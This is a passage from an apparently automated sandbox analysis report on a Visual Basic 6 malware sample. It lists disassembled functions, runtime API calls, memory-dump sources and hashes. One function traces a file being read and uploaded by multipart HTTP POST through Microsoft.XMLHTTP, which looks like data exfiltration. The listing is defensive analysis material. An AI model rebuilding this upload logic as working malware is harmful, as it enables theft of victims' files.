                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 00418990
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,004016A6), ref: 004189C7
                                                                                    • __vbaNew2.MSVBVM60(00416A80,0041F49C,00000001,?,?,?,?,004016A6), ref: 004189DF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416A70,00000014), ref: 00418A23
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416A90,00000068), ref: 00418A5E
                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00416A90,00000068), ref: 00418A77
                                                                                    • __vbaEnd.MSVBVM60(00000000,?,00416A90,00000068), ref: 00418A84
                                                                                    • __vbaNew2.MSVBVM60(00416A80,0041F49C), ref: 00418A9C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416A70,00000014), ref: 00418AE0
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416A90,0000007C), ref: 00418B19
                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00416A90,0000007C), ref: 00418B2A
                                                                                    • __vbaStrMove.MSVBVM60(00000015), ref: 00418B44
                                                                                    • __vbaStrCat.MSVBVM60(004170F4,00000000,00000015), ref: 00418B4F
                                                                                    • __vbaStrMove.MSVBVM60(004170F4,00000000,00000015), ref: 00418B5B
                                                                                    • __vbaFreeStr.MSVBVM60(004170F4,00000000,00000015), ref: 00418B63
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004168F4,000002B4), ref: 00418B91
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 00418BB2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004170F8,00000064), ref: 00418BDF
                                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,004170F8,00000064), ref: 00418BF0
                                                                                    • __vbaFreeVar.MSVBVM60(?), ref: 00418C01
                                                                                    • __vbaExitProc.MSVBVM60(?), ref: 00418C06
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$Free$MoveNew2$ChkstkErrorExitProc
                                                                                    • String ID:
                                                                                    • API String ID: 3776675287-0
                                                                                    • Opcode ID: b3f2fb6e2aa79287ece8d79a14fbc9041dde46026440260761e10a4f03f79175
                                                                                    • Instruction ID: 95d55bffaa9c10941f80707ccb6c9f706f222b6f3902ea82f2f3b846d5060bf6
                                                                                    • Opcode Fuzzy Hash: b3f2fb6e2aa79287ece8d79a14fbc9041dde46026440260761e10a4f03f79175
                                                                                    • Instruction Fuzzy Hash: 9391C471E40218EFCB10EFA5C845BDDBBB5BF08345F10802AE505BB2A1DB799986DB58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041AAFB Relevance: 30.1, APIs: 20, Instructions: 128COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000015,004016A6,00000001,?,?,?,?,004016A6), ref: 0041AB17
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB47
                                                                                    • __vbaStrCopy.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB5B
                                                                                    • __vbaNew2.MSVBVM60(00416410,0041F010,000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB7A
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004168F4,00000058), ref: 0041ABBE
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,000000FF), ref: 0041ABE0
                                                                                    • #525.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC07
                                                                                    • __vbaStrMove.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC11
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000104,?,?,000000FF), ref: 0041AC24
                                                                                    • __vbaSetSystemError.MSVBVM60(000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC35
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC41
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC58
                                                                                    • __vbaInStr.MSVBVM60(00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC78
                                                                                    • #616.MSVBVM60(?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC86
                                                                                    • __vbaStrMove.MSVBVM60(?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC90
                                                                                    • __vbaStrCat.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041AC9B
                                                                                    • __vbaStrMove.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041ACA5
                                                                                    • __vbaFreeStr.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041ACAD
                                                                                    • __vbaFreeStr.MSVBVM60(0041ACDD,?,?,000000FF), ref: 0041ACD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFreeMove$System$#525#616AnsiCheckChkstkCopyHresultNew2Unicode
                                                                                    • String ID:
                                                                                    • API String ID: 3774617751-0
                                                                                    • Opcode ID: 58e5e3e29819266087c6655484509c59bbbfff14f4bf298e7f327d3ab0e8c61d
                                                                                    • Instruction ID: 0d516e271f935913a1fe3f5c3d4f61ee720b3f0bf101366f76cdc0551026772c
                                                                                    • Opcode Fuzzy Hash: 58e5e3e29819266087c6655484509c59bbbfff14f4bf298e7f327d3ab0e8c61d
                                                                                    • Instruction Fuzzy Hash: 26513971D01208EBCF01EFA1D946BDEBBB5AF04308F10402AF101B71A1DB799E85DB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00416D94 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 703 416d94-416d9b 704 416d9d 703->704 705 416d9f-416da4 703->705 704->705 706 416dab 705->706 706->706
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0955177fc245cb7a9a2a4132eb02e3c160847dd3f512d4b7ab45a6bc18e56183
                                                                                    • Instruction ID: 79a1ac6d492836cc8cbafdc7ffb06cefa4230bac26da89a1079b36b27f2febcd
                                                                                    • Opcode Fuzzy Hash: 0955177fc245cb7a9a2a4132eb02e3c160847dd3f512d4b7ab45a6bc18e56183
                                                                                    • Instruction Fuzzy Hash: 90B012303948019E530046ECBC015A222A096083C03218C33F040C21A0CB18DC84412E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00416E54 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 707 416e54-416e5b 708 416e5d 707->708 709 416e5f-416e64 707->709 708->709 710 416e6b 709->710 710->710
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c16770bc68dec999ce0b4a2e743a91edb2e451caa748e41dc5630694abedb265
                                                                                    • Instruction ID: 9866718c052a2dfcc1579e4b013b284f7e1a2ebe61e2e7d1492e85f84d89d239
                                                                                    • Opcode Fuzzy Hash: c16770bc68dec999ce0b4a2e743a91edb2e451caa748e41dc5630694abedb265
                                                                                    • Instruction Fuzzy Hash: B9B012383942019A5200425CCE015A231809200B803218D33F440D22A1CA18CC46852E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00416EA4 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 711 416ea4-416eab 712 416ead 711->712 713 416eaf-416eb4 711->713 712->713 714 416ebb 713->714 714->714
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2831d19e7af437c120eb04fbf812dca0cce52663c0e26db91972fef501ca1cdc
                                                                                    • Instruction ID: 622032e06055997d66a6545ff7ff85c9a599ce9688cbcbd77ff6c6df03f8dece
                                                                                    • Opcode Fuzzy Hash: 2831d19e7af437c120eb04fbf812dca0cce52663c0e26db91972fef501ca1cdc
                                                                                    • Instruction Fuzzy Hash: 94B012383D42029A5700535CCC424A23280A7007803214D33F04CC31E0CB18EC40812E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 0041A3FF Relevance: 157.9, APIs: 79, Strings: 11, Instructions: 444COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 0041A41D
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 0041A45E
                                                                                    • #648.MSVBVM60(0000000A), ref: 0041A47C
                                                                                    • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041A488
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,?,00000000,0000000A), ref: 0041A4A3
                                                                                    • #570.MSVBVM60(?,00000120,000000FF,?,00000000,0000000A), ref: 0041A4B2
                                                                                    • #570.MSVBVM60(?,00000000,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A4CB
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,?,00000000,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A4E9
                                                                                    • __vbaGetOwner3.MSVBVM60(004175BC,?,?,?,000000FF,?,?,?,?,004016A6), ref: 0041A504
                                                                                    • #717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041A52F
                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041A538
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041A542
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041A54A
                                                                                    • __vbaFileClose.MSVBVM60(?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A559
                                                                                    • #709.MSVBVM60(00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A573
                                                                                    • __vbaStrCat.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A596
                                                                                    • __vbaStrMove.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A5A0
                                                                                    • __vbaStrCat.MSVBVM60(004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A5AB
                                                                                    • __vbaStrMove.MSVBVM60(004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A5B5
                                                                                    • __vbaStrCat.MSVBVM60(Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000), ref: 0041A5C0
                                                                                    • __vbaStrMove.MSVBVM60(Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000), ref: 0041A5CA
                                                                                    • #631.MSVBVM60(00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?), ref: 0041A5E9
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?), ref: 0041A5F3
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?), ref: 0041A5F9
                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?), ref: 0041A603
                                                                                    • __vbaStrCat.MSVBVM60(00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF), ref: 0041A60E
                                                                                    • __vbaStrMove.MSVBVM60(00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF), ref: 0041A618
                                                                                    • __vbaStrCat.MSVBVM60(004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000), ref: 0041A623
                                                                                    • __vbaStrMove.MSVBVM60(004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000), ref: 0041A62D
                                                                                    • __vbaStrCat.MSVBVM60(Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113), ref: 0041A638
                                                                                    • __vbaStrMove.MSVBVM60(Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113), ref: 0041A642
                                                                                    • __vbaStrCat.MSVBVM60(004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0), ref: 0041A64D
                                                                                    • __vbaStrMove.MSVBVM60(004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0), ref: 0041A657
                                                                                    • __vbaStrCat.MSVBVM60(004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename="), ref: 0041A662
                                                                                    • __vbaStrMove.MSVBVM60(004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename="), ref: 0041A66C
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A), ref: 0041A675
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A), ref: 0041A67F
                                                                                    • __vbaStrCat.MSVBVM60(004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000), ref: 0041A68A
                                                                                    • __vbaStrMove.MSVBVM60(004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000), ref: 0041A694
                                                                                    • __vbaStrCat.MSVBVM60(004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000), ref: 0041A69F
                                                                                    • __vbaStrMove.MSVBVM60(004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000), ref: 0041A6A9
                                                                                    • __vbaStrCat.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,00000000,004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000), ref: 0041A6B4
                                                                                    • __vbaStrMove.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,00000000,004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000), ref: 0041A6BE
                                                                                    • __vbaStrCat.MSVBVM60(004175D8,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,00000000,004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000), ref: 0041A6C9
                                                                                    • __vbaStrMove.MSVBVM60(004175D8,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,00000000,004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000), ref: 0041A6D3
                                                                                    • __vbaFreeStrList.MSVBVM60(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004175D8), ref: 0041A712
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,004016A6), ref: 0041A71D
                                                                                    • #716.MSVBVM60(?,Microsoft.XMLHTTP,00000000,?,?,?,?,?,?,?,?,?,000000FF), ref: 0041A734
                                                                                    • __vbaVarZero.MSVBVM60(?,Microsoft.XMLHTTP,00000000,?,?,?,?,?,?,?,?,?,000000FF), ref: 0041A742
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A794
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A7A8
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A7BC
                                                                                    • __vbaObjVar.MSVBVM60(?,Open,00000003), ref: 0041A7DA
                                                                                    • __vbaLateMemCall.MSVBVM60(00000000,?,Open,00000003), ref: 0041A7E0
                                                                                    • __vbaStrCat.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 0041A80A
                                                                                    • __vbaChkstk.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 0041A81C
                                                                                    • __vbaChkstk.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 0041A830
                                                                                    • __vbaObjVar.MSVBVM60(?,SetRequestHeader,00000002,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 0041A84B
                                                                                    • __vbaLateMemCall.MSVBVM60(00000000,?,SetRequestHeader,00000002,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 0041A851
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041A85C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416924,00000708), ref: 0041A8A3
                                                                                    • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,00416924,00000708), ref: 0041A8DD
                                                                                    • __vbaObjVar.MSVBVM60(?,Send,00000001), ref: 0041A8F8
                                                                                    • __vbaLateMemCall.MSVBVM60(00000000,?,Send,00000001), ref: 0041A8FE
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041A909
                                                                                    • __vbaVarLateMemCallLd.MSVBVM60(00002011,?,ResponseText,00000000), ref: 0041A935
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041A93E
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0041A948
                                                                                    • __vbaFreeVar.MSVBVM60(00000000), ref: 0041A950
                                                                                    • __vbaFreeVar.MSVBVM60(0041A9F4), ref: 0041A9CD
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,0041A9F4,0041A9F4), ref: 0041A9DB
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00000000,0041A9F4,0041A9F4), ref: 0041A9E6
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,00000000,0041A9F4,0041A9F4), ref: 0041A9EE
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF), ref: 0041AA1B
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,?,?,004016A6), ref: 0041AA3C
                                                                                    • #717.MSVBVM60(?,00004008,00000080,00000000), ref: 0041AA7C
                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,00004008,00000080,00000000), ref: 0041AA89
                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041AA96
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041AA9E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$Chkstk$CallLate$#570#717DestructErrorFile$#631#648#709#716CheckCloseHresultListOpenOverflowOwner3RedimVar2Zero
                                                                                    • String ID: 3fbd04f5-b1ed-4060-99b9-fca7ff59c113$Content-Disposition: form-data; name="document"; filename="$Content-Type$Content-Type: application/octet-stream$Microsoft.XMLHTTP$Open$POST$ResponseText$Send$SetRequestHeader$multipart/form-data; boundary=
                                                                                    • API String ID: 4222018757-2892837455
                                                                                    • Opcode ID: b6faac7f32e4b666445206824952df880dc75c7e783993431d8fe6683cbf186b
                                                                                    • Instruction ID: f5a44d5713a457a5f6a0709c5bc5f85fc92455a6486fe3938b3513bff18aa3db
                                                                                    • Opcode Fuzzy Hash: b6faac7f32e4b666445206824952df880dc75c7e783993431d8fe6683cbf186b
                                                                                    • Instruction Fuzzy Hash: F0F12172D40208ABDB11EFA1CC46BDE7BB9AF04704F20816BF504B71A1EB795A858F65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419A9A Relevance: 135.2, APIs: 68, Strings: 9, Instructions: 426COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 00419AB8
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,004016A6), ref: 00419AE5
                                                                                    • __vbaStrCopy.MSVBVM60(00000001,?,?,?,?,004016A6), ref: 00419AF2
                                                                                      • Part of subcall function 0041ACF6: __vbaChkstk.MSVBVM60(00000000,004016A6,?,00000015,004016A6,00000001), ref: 0041AD12
                                                                                      • Part of subcall function 0041ACF6: __vbaLenBstr.MSVBVM60(004014C0,?,?,?,00000000,004016A6), ref: 0041AD29
                                                                                      • Part of subcall function 0041ACF6: #632.MSVBVM60(?,00004008,00000001,00000002), ref: 0041ADA0
                                                                                      • Part of subcall function 0041ACF6: __vbaVarCat.MSVBVM60(?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADB4
                                                                                      • Part of subcall function 0041ACF6: __vbaI4ErrVar.MSVBVM60(00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADBA
                                                                                      • Part of subcall function 0041ACF6: #537.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADC0
                                                                                      • Part of subcall function 0041ACF6: __vbaStrMove.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADCA
                                                                                      • Part of subcall function 0041ACF6: __vbaStrCat.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADD0
                                                                                      • Part of subcall function 0041ACF6: __vbaStrMove.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADDA
                                                                                      • Part of subcall function 0041ACF6: __vbaFreeStr.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADE2
                                                                                      • Part of subcall function 0041ACF6: __vbaFreeVarList.MSVBVM60(00000004,00000002,?,?,?,00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADF9
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001,?,?,?,?,004016A6), ref: 00419B05
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000001,?,?,?,?,004016A6), ref: 00419B12
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419B2D
